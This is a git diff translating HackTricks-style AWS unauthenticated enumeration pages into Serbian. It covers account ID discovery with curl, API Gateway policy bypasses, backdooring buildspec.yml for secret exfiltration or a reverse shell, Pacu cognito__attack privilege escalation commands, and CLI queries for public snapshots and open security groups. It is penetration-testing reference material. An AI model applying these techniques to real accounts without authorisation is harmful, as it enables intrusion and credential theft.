+- [**Neautentifikovana Enum DocumentDB**](aws-documentdb-enum.md)
+- [**Neautentifikovana Enum EC2**](aws-ec2-unauthenticated-enum.md)
+- [**Neautentifikovana Enum Elasticsearch**](aws-elasticsearch-unauthenticated-enum.md)
+- [**Neautentifikovana Enum IAM**](aws-iam-and-sts-unauthenticated-enum.md)
+- [**Neautentifikovani Pristup IoT**](aws-iot-unauthenticated-enum.md)
+- [**Neautentifikovani Pristup Kinesis Video**](aws-kinesis-video-unauthenticated-enum.md)
+- [**Neautentifikovani Pristup Mediji**](aws-media-unauthenticated-enum.md)
+- [**Neautentifikovani Pristup MQ**](aws-mq-unauthenticated-enum.md)
+- [**Neautentifikovani Pristup MSK**](aws-msk-unauthenticated-enum.md)
+- [**Neautentifikovani Pristup RDS**](aws-rds-unauthenticated-enum.md)
+- [**Neautentifikovani Pristup Redshift**](aws-redshift-unauthenticated-enum.md)
+- [**Neautentifikovani Pristup SQS**](aws-sqs-unauthenticated-enum.md)
+- [**Neautentifikovani Pristup S3**](aws-s3-unauthenticated-enum.md)
 
-## Cross Account Attacks
+## Napadi Preko Naloga
 
-In the talk [**Breaking the Isolation: Cross-Account AWS Vulnerabilities**](https://www.youtube.com/watch?v=JfEFIcpJ2wk) it's presented how some services allow(ed) any AWS account accessing them because **AWS services without specifying accounts ID** were allowed.
+U predavanju [**Rušenje Izolacije: AWS Ranljivosti Preko Naloga**](https://www.youtube.com/watch?v=JfEFIcpJ2wk) prikazano je kako neke usluge omogućavaju bilo kojem AWS nalogu pristup njima jer su **AWS usluge bez specificiranja ID-a naloga** bile dozvoljene.
 
-During the talk they specify several examples, such as S3 buckets **allowing cloudtrai**l (of **any AWS** account) to **write to them**:
+Tokom predavanja navode se nekoliko primera, kao što su S3 bucket-i **koji omogućavaju cloudtrail** (bilo kojem **AWS** nalogu) da **pišu u njih**:
 
 ![](<../../../images/image (260).png>)
 
-Other services found vulnerable:
+Druge usluge koje su pronađene ranjive:
 
 - AWS Config
-- Serverless repository
+- Serverless repozitorijum
 
-## Tools
+## Alati
 
-- [**cloud_enum**](https://github.com/initstring/cloud_enum): Multi-cloud OSINT tool. **Find public resources** in AWS, Azure, and Google Cloud. Supported AWS services: Open / Protected S3 Buckets, awsapps (WorkMail, WorkDocs, Connect, etc.)
+- [**cloud_enum**](https://github.com/initstring/cloud_enum): Multi-cloud OSINT alat. **Pronađite javne resurse** u AWS-u, Azure-u i Google Cloud-u. Podržane AWS usluge: Otvoreni / Zaštićeni S3 bucket-i, awsapps (WorkMail, WorkDocs, Connect, itd.)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.md
index 84c70ed0e..49b66d9bb 100644
--- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.md
@@ -2,14 +2,13 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## Account IDs
+## ID-ovi naloga
 
-If you have a target there are ways to try to identify account IDs of accounts related to the target.
+Ako imate cilj, postoje načini da pokušate da identifikujete ID-ove naloga koji su povezani sa ciljem.
 
 ### Brute-Force
 
-You create a list of potential account IDs and aliases and check them
-
+Kreirate listu potencijalnih ID-ova naloga i aliasa i proveravate ih.
 ```bash
 # Check if an account ID exists
 curl -v https://.signin.aws.amazon.com
@@ -17,33 +16,28 @@ curl -v https://.signin.aws.amazon.com
 ## It also works from account aliases
 curl -v https://vodafone-uk2.signin.aws.amazon.com
 ```
-
-You can [automate this process with this tool](https://github.com/dagrz/aws_pwn/blob/master/reconnaissance/validate_accounts.py).
+Možete [automatizovati ovaj proces sa ovim alatom](https://github.com/dagrz/aws_pwn/blob/master/reconnaissance/validate_accounts.py).
 
 ### OSINT
 
-Look for urls that contains `.signin.aws.amazon.com` with an **alias related to the organization**.
+Tražite URL-ove koji sadrže `.signin.aws.amazon.com` sa **aliasom vezanim za organizaciju**.
 
 ### Marketplace
 
-If a vendor has **instances in the marketplace,** you can get the owner id (account id) of the AWS account he used.
+Ako prodavac ima **instance na tržištu,** možete dobiti id vlasnika (id računa) AWS računa koji je koristio.
 
 ### Snapshots
 
-- Public EBS snapshots (EC2 -> Snapshots -> Public Snapshots)
-- RDS public snapshots (RDS -> Snapshots -> All Public Snapshots)
-- Public AMIs (EC2 -> AMIs -> Public images)
+- Javne EBS snimke (EC2 -> Snapshots -> Public Snapshots)
+- RDS javne snimke (RDS -> Snapshots -> All Public Snapshots)
+- Javne AMI (EC2 -> AMIs -> Public images)
 
 ### Errors
 
-Many AWS error messages (even access denied) will give that information.
+Mnoge AWS poruke o grešci (čak i pristup odbijen) će dati te informacije.
 
 ## References
 
 - [https://www.youtube.com/watch?v=8ZXRw4Ry3mQ](https://www.youtube.com/watch?v=8ZXRw4Ry3mQ)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.md
index 5a69bebe0..6c6277a7d 100644
--- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.md
@@ -4,23 +4,21 @@
 
 ### API Invoke bypass
 
-According to the talk [Attack Vectors for APIs Using AWS API Gateway Lambda Authorizers - Alexandre & Leonardo](https://www.youtube.com/watch?v=bsPKk7WDOnE), Lambda Authorizers can be configured **using IAM syntax** to give permissions to invoke API endpoints. This is taken [**from the docs**](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-control-access-using-iam-policies-to-invoke-api.html):
-
+Prema predavanju [Attack Vectors for APIs Using AWS API Gateway Lambda Authorizers - Alexandre & Leonardo](https://www.youtube.com/watch?v=bsPKk7WDOnE), Lambda Authorizers mogu biti konfigurisani **koristeći IAM sintaksu** da daju dozvole za pozivanje API krajnjih tačaka. Ovo je preuzeto [**iz dokumentacije**](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-control-access-using-iam-policies-to-invoke-api.html):
 ```json
 {
-  "Version": "2012-10-17",
-  "Statement": [
-    {
-      "Effect": "Permission",
-      "Action": ["execute-api:Execution-operation"],
-      "Resource": [
-        "arn:aws:execute-api:region:account-id:api-id/stage/METHOD_HTTP_VERB/Resource-path"
-      ]
-    }
-  ]
+"Version": "2012-10-17",
+"Statement": [
+{
+"Effect": "Permission",
+"Action": ["execute-api:Execution-operation"],
+"Resource": [
+"arn:aws:execute-api:region:account-id:api-id/stage/METHOD_HTTP_VERB/Resource-path"
+]
+}
+]
 }
 ```
-
 The problem with this way to give permissions to invoke endpoints is that the **"\*" implies "anything"** and there is **no more regex syntax supported**.
 
 Some examples:
@@ -41,20 +39,14 @@ For more info, apart of the [**docs**](https://docs.aws.amazon.com/apigateway/la
 In the same [**talk** ](https://www.youtube.com/watch?v=bsPKk7WDOnE)it's exposed the fact that if the code is using **user input** to **generate the IAM policies**, wildcards (and others such as "." or specific strings) can be included in there with the goal of **bypassing restrictions**.
 
 ### Public URL template
-
 ```
 https://{random_id}.execute-api.{region}.amazonaws.com/{user_provided}
 ```
+### Dobijanje ID-a naloga sa javnog API Gateway URL-a
 
-### Get Account ID from public API Gateway URL
+Baš kao i kod S3 kanti, Data Exchange i Lambda URL-a, moguće je pronaći ID naloga koristeći **`aws:ResourceAccount`** **Policy Condition Key** iz javnog API Gateway URL-a. To se postiže pronalaženjem ID-a naloga jedan po jedan karakter koristeći džokere u **`aws:ResourceAccount`** sekciji politike.\
+Ova tehnika takođe omogućava dobijanje **vrednosti oznaka** ako znate ključ oznake (ima nekoliko podrazumevanih zanimljivih).
 
-Just like with S3 buckets, Data Exchange and Lambda URLs gateways, It's possible to find the account ID of an account abusing the **`aws:ResourceAccount`** **Policy Condition Key** from a public API Gateway URL. This is done by finding the account ID one character at a time abusing wildcards in the **`aws:ResourceAccount`** section of the policy.\
-This technique also allows to get **values of tags** if you know the tag key (there some default interesting ones).
-
-You can find more information in the [**original research**](https://blog.plerion.com/conditional-love-for-aws-metadata-enumeration/) and the tool [**conditional-love**](https://github.com/plerionhq/conditional-love/) to automate this exploitation.
+Možete pronaći više informacija u [**originalnom istraživanju**](https://blog.plerion.com/conditional-love-for-aws-metadata-enumeration/) i alatu [**conditional-love**](https://github.com/plerionhq/conditional-love/) za automatizaciju ove eksploatacije.
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md
index 0284e2514..1f009b660 100644
--- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md
@@ -2,14 +2,8 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-### Public URL template
-
+### Javni URL šablon
 ```
 https://{random_id}.cloudfront.net
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.md
index d95410a62..2322056ba 100644
--- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.md
+++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.md
@@ -1,10 +1,10 @@
-# AWS - CodeBuild Unauthenticated Access
+# AWS - CodeBuild Neautentifikovani Pristup
 
 {{#include ../../../banners/hacktricks-training.md}}
 
 ## CodeBuild
 
-For more info check this page:
+Za više informacija pogledajte ovu stranicu:
 
 {{#ref}}
 ../aws-services/aws-codebuild-enum.md
@@ -12,28 +12,22 @@ For more info check this page:
 
 ### buildspec.yml
 
-If you compromise write access over a repository containing a file named **`buildspec.yml`**, you could **backdoor** this file, which specifies the **commands that are going to be executed** inside a CodeBuild project and exfiltrate the secrets, compromise what is done and also compromise the **CodeBuild IAM role credentials**.
+Ako kompromitujete pristup za pisanje nad repozitorijumom koji sadrži datoteku nazvanu **`buildspec.yml`**, mogli biste **unazaditi** ovu datoteku, koja specificira **komande koje će biti izvršene** unutar CodeBuild projekta i eksfiltrirati tajne, kompromitovati ono što se radi i takođe kompromitovati **CodeBuild IAM uloge akreditive**.
 
-Note that even if there isn't any **`buildspec.yml`** file but you know Codebuild is being used (or a different CI/CD) **modifying some legit code** that is going to be executed can also get you a reverse shell for example.
+Imajte na umu da čak i ako ne postoji nijedna **`buildspec.yml`** datoteka, ali znate da se koristi Codebuild (ili druga CI/CD), **modifikovanje nekog legitimnog koda** koji će biti izvršen može vam takođe doneti obrnuti shell, na primer.
 
-For some related information you could check the page about how to attack Github Actions (similar to this):
+Za neke povezane informacije možete pogledati stranicu o tome kako napasti Github Actions (slično ovome):
 
 {{#ref}}
 ../../../pentesting-ci-cd/github-security/abusing-github-actions/
 {{#endref}}
 
-## Self-hosted GitHub Actions runners in AWS CodeBuild 
-
-As [**indicated in the docs**](https://docs.aws.amazon.com/codebuild/latest/userguide/action-runner.html), It's possible to configure **CodeBuild** to run **self-hosted Github actions** when a workflow is triggered inside a Github repo configured. This can be detected checking the CodeBuild project configuration because the **`Event type`** needs to contain: **`WORKFLOW_JOB_QUEUED`** and in a Github Workflow because it will select a **self-hosted** runner like this:
+## Samostalno hostovani GitHub Actions pokretači u AWS CodeBuild 
 
+Kao što je [**naznačeno u dokumentaciji**](https://docs.aws.amazon.com/codebuild/latest/userguide/action-runner.html), moguće je konfigurisati **CodeBuild** da pokreće **samostalno hostovane Github akcije** kada se pokrene radni tok unutar konfigurisanog Github repozitorijuma. Ovo se može otkriti proverom konfiguracije CodeBuild projekta jer **`Tip događaja`** mora sadržati: **`WORKFLOW_JOB_QUEUED`** i u Github radnom toku jer će odabrati **samostalno hostovan** pokretač poput ovog:
 ```bash
 runs-on: codebuild--${{ github.run_id }}-${{ github.run_attempt }}
 ```
-
-This new relationship between Github Actions and AWS creates another way to compromise AWS from Github as the code in Github will be running in a CodeBuild project with an IAM role attached.
+Ova nova veza između Github Actions i AWS stvara još jedan način za kompromitovanje AWS-a iz Github-a, jer će kod u Github-u raditi u CodeBuild projektu sa priloženom IAM ulogom.
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.md
index 6f26f3a34..0b9ee84d3 100644
--- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.md
@@ -4,9 +4,9 @@
 
 ## Unauthenticated Cognito
 
-Cognito is an AWS service that enable developers to **grant their app users access to AWS services**. Developers will grant **IAM roles to authenticated users** in their app (potentially people willbe able to just sign up) and they can also grant an **IAM role to unauthenticated users**.
+Cognito je AWS usluga koja omogućava programerima da **dodele pristup AWS uslugama svojim korisnicima aplikacije**. Programeri će dodeliti **IAM uloge autentifikovanim korisnicima** u svojoj aplikaciji (potencijalno će ljudi moći samo da se prijave) i takođe mogu dodeliti **IAM ulogu neautentifikovanim korisnicima**.
 
-For basic info about Cognito check:
+Za osnovne informacije o Cognitu pogledajte:
 
 {{#ref}}
 ../aws-services/aws-cognito-enum/
@@ -14,39 +14,31 @@ For basic info about Cognito check:
 
 ### Identity Pool ID
 
-Identity Pools can grant **IAM roles to unauthenticated users** that just **know the Identity Pool ID** (which is fairly common to **find**), and attacker with this info could try to **access that IAM rol**e and exploit it.\
-Moreoever, IAM roles could also be assigned to **authenticated users** that access the Identity Pool. If an attacker can **register a user** or already has **access to the identity provider** used in the identity pool you could access to the **IAM role being given to authenticated** users and abuse its privileges.
+Identity Pools mogu dodeliti **IAM uloge neautentifikovanim korisnicima** koji samo **znaju Identity Pool ID** (što je prilično uobičajeno da se **pronađe**), a napadač sa ovom informacijom mogao bi pokušati da **pristupi toj IAM ulozi** i iskoristi je.\
+Pored toga, IAM uloge takođe mogu biti dodeljene **autentifikovanim korisnicima** koji pristupaju Identity Pool-u. Ako napadač može **registrovati korisnika** ili već ima **pristup provajderu identiteta** koji se koristi u identity pool-u, mogao bi pristupiti **IAM ulozi koja se dodeljuje autentifikovanim** korisnicima i zloupotrebiti njene privilegije.
 
-[**Check how to do that here**](../aws-services/aws-cognito-enum/cognito-identity-pools.md).
+[**Pogledajte kako to uraditi ovde**](../aws-services/aws-cognito-enum/cognito-identity-pools.md).
 
 ### User Pool ID
 
-By default Cognito allows to **register new user**. Being able to register a user might give you **access** to the **underlaying application** or to the **authenticated IAM access role of an Identity Pool** that is accepting as identity provider the Cognito User Pool. [**Check how to do that here**](../aws-services/aws-cognito-enum/cognito-user-pools.md#registration).
+Po defaultu, Cognito omogućava **registraciju novog korisnika**. Mogućnost registracije korisnika može vam dati **pristup** **osnovnoj aplikaciji** ili **autentifikovanoj IAM ulozi pristupa Identity Pool-u** koji prihvata Cognito User Pool kao provajder identiteta. [**Pogledajte kako to uraditi ovde**](../aws-services/aws-cognito-enum/cognito-user-pools.md#registration).
 
-### Pacu modules for pentesting and enumeration
+### Pacu moduli za pentesting i enumeraciju
 
-[Pacu](https://github.com/RhinoSecurityLabs/pacu), the AWS exploitation framework, now includes the "cognito\_\_enum" and "cognito\_\_attack" modules that automate enumeration of all Cognito assets in an account and flag weak configurations, user attributes used for access control, etc., and also automate user creation (including MFA support) and privilege escalation based on modifiable custom attributes, usable identity pool credentials, assumable roles in id tokens, etc.
+[Pacu](https://github.com/RhinoSecurityLabs/pacu), AWS okvir za eksploataciju, sada uključuje module "cognito\_\_enum" i "cognito\_\_attack" koji automatizuju enumeraciju svih Cognito resursa u nalogu i označavaju slabe konfiguracije, atribute korisnika korišćene za kontrolu pristupa, itd., i takođe automatizuju kreiranje korisnika (uključujući podršku za MFA) i eskalaciju privilegija na osnovu modifikabilnih prilagođenih atributa, upotrebljivih kredencijala identity pool-a, preuzimljivih uloga u id tokenima, itd.
 
-For a description of the modules' functions see part 2 of the [blog post](https://rhinosecuritylabs.com/aws/attacking-aws-cognito-with-pacu-p2). For installation instructions see the main [Pacu](https://github.com/RhinoSecurityLabs/pacu) page.
+Za opis funkcija modula pogledajte deo 2 [blog posta](https://rhinosecuritylabs.com/aws/attacking-aws-cognito-with-pacu-p2). Za uputstva za instalaciju pogledajte glavnu [Pacu](https://github.com/RhinoSecurityLabs/pacu) stranicu.
 
-#### Usage
-
-Sample `cognito__attack` usage to attempt user creation and all privesc vectors against a given identity pool and user pool client:
+#### Korišćenje
 
+Primer korišćenja `cognito__attack` za pokušaj kreiranja korisnika i svih privesc vektora protiv datog identity pool-a i korisničkog pool klijenta:
 ```bash
 Pacu (new:test) > run cognito__attack --username randomuser --email XX+sdfs2@gmail.com --identity_pools
 us-east-2:a06XXXXX-c9XX-4aXX-9a33-9ceXXXXXXXXX --user_pool_clients
 59f6tuhfXXXXXXXXXXXXXXXXXX@us-east-2_0aXXXXXXX
 ```
-
-Sample cognito\_\_enum usage to gather all user pools, user pool clients, identity pools, users, etc. visible in the current AWS account:
-
+Primer cognito\_\_enum korišćenja za prikupljanje svih korisničkih bazena, klijenata korisničkih bazena, identitetskih bazena, korisnika itd. vidljivih u trenutnom AWS nalogu:
 ```bash
 Pacu (new:test) > run cognito__enum
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-documentdb-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-documentdb-enum.md
index 004a92c2b..f90560ad1 100644
--- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-documentdb-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-documentdb-enum.md
@@ -2,14 +2,8 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-### Public URL template
-
+### Javni URL šablon
 ```
 .cluster-..docdb.amazonaws.com
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.md
index e9e7fa8e4..70cdd8a52 100644
--- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.md
+++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.md
@@ -1,19 +1,15 @@
-# AWS - DynamoDB Unauthenticated Access
+# AWS - DynamoDB Neautentifikovani Pristup
 
 {{#include ../../../banners/hacktricks-training.md}}
 
 ## Dynamo DB
 
-For more information check:
+Za više informacija pogledajte:
 
 {{#ref}}
 ../aws-services/aws-dynamodb-enum.md
 {{#endref}}
 
-Apart from giving access to all AWS or some compromised external AWS account, or have some SQL injections in an application that communicates with DynamoDB I'm don't know more options to access AWS accounts from DynamoDB.
+Osim davanja pristupa svim AWS ili nekim kompromitovanim spoljnim AWS računima, ili ako postoje neki SQL injekcije u aplikaciji koja komunicira sa DynamoDB, ne znam više opcija za pristup AWS računima iz DynamoDB.
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.md
index 657bf7f3a..6fded48c9 100644
--- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.md
@@ -1,18 +1,18 @@
-# AWS - EC2 Unauthenticated Enum
+# AWS - EC2 Neautentifikovana Enum
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## EC2 & Related Services
+## EC2 i Povezane Usluge
 
-Check in this page more information about this:
+Proverite na ovoj stranici više informacija o ovome:
 
 {{#ref}}
 ../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/
 {{#endref}}
 
-### Public Ports
+### Javne Portove
 
-It's possible to expose the **any port of the virtual machines to the internet**. Depending on **what is running** in the exposed the port an attacker could abuse it.
+Moguće je izložiti **bilo koji port virtuelnih mašina internetu**. U zavisnosti od **onoga što se pokreće** na izloženom portu, napadač bi mogao da ga zloupotrebi.
 
 #### SSRF
 
@@ -20,10 +20,9 @@ It's possible to expose the **any port of the virtual machines to the internet**
 https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf
 {{#endref}}
 
-### Public AMIs & EBS Snapshots
-
-AWS allows to **give access to anyone to download AMIs and Snapshots**. You can list these resources very easily from your own account:
+### Javne AMI i EBS Snimke
 
+AWS omogućava **da se svakome da pristup za preuzimanje AMI i Snimaka**. Možete lako da navedete ove resurse iz svog naloga:
 ```bash
 # Public AMIs
 aws ec2 describe-images --executable-users all
@@ -38,11 +37,9 @@ aws ec2 describe-images --executable-users all --query 'Images[?contains(ImageLo
 aws ec2 describe-snapshots --restorable-by-user-ids all
 aws ec2 describe-snapshots --restorable-by-user-ids all | jq '.Snapshots[] | select(.OwnerId == "099720109477")'
 ```
+Ako pronađete snimak koji može da se vrati od strane bilo koga, obavezno proverite [AWS - EBS Snapshot Dump](https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump) za uputstva o preuzimanju i pljačkanju snimka.
 
-If you find a snapshot that is restorable by anyone, make sure to check [AWS - EBS Snapshot Dump](https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump) for directions on downloading and looting the snapshot.
-
-#### Public URL template
-
+#### Javni URL šablon
 ```bash
 # EC2
 ec2-{ip-seperated}.compute-1.amazonaws.com
@@ -50,15 +47,8 @@ ec2-{ip-seperated}.compute-1.amazonaws.com
 http://{user_provided}-{random_id}.{region}.elb.amazonaws.com:80/443
 https://{user_provided}-{random_id}.{region}.elb.amazonaws.com
 ```
-
-### Enumerate EC2 instances with public IP
-
+### Enumerisanje EC2 instanci sa javnim IP-om
 ```bash
 aws ec2 describe-instances --query "Reservations[].Instances[?PublicIpAddress!=null].PublicIpAddress" --output text
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md
index 2febbed62..e771f52f6 100644
--- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md
@@ -1,38 +1,30 @@
-# AWS - ECR Unauthenticated Enum
+# AWS - ECR Neautentifikovana Enumeracija
 
 {{#include ../../../banners/hacktricks-training.md}}
 
 ## ECR
 
-For more information check:
+Za više informacija pogledajte:
 
 {{#ref}}
 ../aws-services/aws-ecr-enum.md
 {{#endref}}
 
-### Public registry repositories (images)
-
-As mentioned in the ECS Enum section, a public registry is **accessible by anyone** uses the format **`public.ecr.aws//`**. If a public repository URL is located by an attacker he could **download the image and search for sensitive information** in the metadata and content of the image.
+### Javne registri repozitorijumi (slike)
 
+Kao što je pomenuto u sekciji ECS Enumeracija, javni registar je **dostupan svima** i koristi format **`public.ecr.aws//`**. Ako napadač pronađe URL javnog repozitorijuma, mogao bi **preuzeti sliku i tražiti osetljive informacije** u metapodacima i sadržaju slike.
 ```bash
 aws ecr describe-repositories --query 'repositories[?repositoryUriPublic == `true`].repositoryName' --output text
 ```
-
 > [!WARNING]
-> This could also happen in **private registries** where a registry policy or a repository policy is **granting access for example to `"AWS": "*"`**. Anyone with an AWS account could access that repo.
+> Ovo se takođe može desiti u **privatnim registrima** gde politika registra ili politika repozitorijuma **dodeljuje pristup na primer `"AWS": "*"`**. Svako ko ima AWS nalog može pristupiti tom repozitorijumu.
 
 ### Enumerate Private Repo
 
-The tools [**skopeo**](https://github.com/containers/skopeo) and [**crane**](https://github.com/google/go-containerregistry/blob/main/cmd/crane/doc/crane.md) can be used to list accessible repositories inside a private registry.
-
+Alati [**skopeo**](https://github.com/containers/skopeo) i [**crane**](https://github.com/google/go-containerregistry/blob/main/cmd/crane/doc/crane.md) mogu se koristiti za listanje dostupnih repozitorijuma unutar privatnog registra.
 ```bash
 # Get image names
 skopeo list-tags docker:// | grep -oP '(?<=^Name: ).+'
 crane ls  | sed 's/ .*//'
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md
index 8d0b02ba2..65a28ec35 100644
--- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md
@@ -1,19 +1,18 @@
-# AWS - ECS Unauthenticated Enum
+# AWS - ECS Neautentifikovana Enum
 
 {{#include ../../../banners/hacktricks-training.md}}
 
 ## ECS
 
-For more information check:
+Za više informacija pogledajte:
 
 {{#ref}}
 ../aws-services/aws-ecs-enum.md
 {{#endref}}
 
-### Publicly Accessible Security Group or Load Balancer for ECS Services
-
-A misconfigured security group that **allows inbound traffic from the internet (0.0.0.0/0 or ::/0)** to the Amazon ECS services could expose the AWS resources to attacks.
+### Javno Dostupna Bezbednosna Grupa ili Load Balancer za ECS Usluge
 
+Pogrešno konfigurisana bezbednosna grupa koja **dozvoljava dolazni saobraćaj sa interneta (0.0.0.0/0 ili ::/0)** za Amazon ECS usluge može izložiti AWS resurse napadima.
 ```bash
 # Example of detecting misconfigured security group for ECS services
 aws ec2 describe-security-groups --query 'SecurityGroups[?IpPermissions[?contains(IpRanges[].CidrIp, `0.0.0.0/0`) || contains(Ipv6Ranges[].CidrIpv6, `::/0`)]]'
@@ -21,9 +20,4 @@ aws ec2 describe-security-groups --query 'SecurityGroups[?IpPermissions[?contain
 # Example of detecting a publicly accessible load balancer for ECS services
 aws elbv2 describe-load-balancers --query 'LoadBalancers[?Scheme == `internet-facing`]'
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.md
index 3a73a7328..86260b7fb 100644
--- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.md
@@ -1,41 +1,35 @@
-# AWS - Elastic Beanstalk Unauthenticated Enum
+# AWS - Elastic Beanstalk Neautentifikovana Enumeracija
 
 {{#include ../../../banners/hacktricks-training.md}}
 
 ## Elastic Beanstalk
 
-For more information check:
+Za više informacija pogledajte:
 
 {{#ref}}
 ../aws-services/aws-elastic-beanstalk-enum.md
 {{#endref}}
 
-### Web vulnerability
+### Web ranjivost
 
-Note that by default Beanstalk environments have the **Metadatav1 disabled**.
+Imajte na umu da su po defaultu Beanstalk okruženja **Metadatav1 onemogućena**.
 
-The format of the Beanstalk web pages is **`https://-env..elasticbeanstalk.com/`**
+Format Beanstalk web stranica je **`https://-env..elasticbeanstalk.com/`**
 
-### Insecure Security Group Rules
+### Nepropisna pravila sigurnosne grupe
 
-Misconfigured security group rules can expose Elastic Beanstalk instances to the public. **Overly permissive ingress rules, such as allowing traffic from any IP address (0.0.0.0/0) on sensitive ports, can enable attackers to access the instance**.
+Pogrešno konfigurisana pravila sigurnosne grupe mogu izložiti Elastic Beanstalk instance javnosti. **Previše permisivna pravila ulaza, kao što je dozvoljavanje saobraćaja sa bilo koje IP adrese (0.0.0.0/0) na osetljivim portovima, mogu omogućiti napadačima pristup instanci**.
 
-### Publicly Accessible Load Balancer
+### Javna dostupnost Load Balancera
 
-If an Elastic Beanstalk environment uses a load balancer and the load balancer is configured to be publicly accessible, attackers can **send requests directly to the load balancer**. While this might not be an issue for web applications intended to be publicly accessible, it could be a problem for private applications or environments.
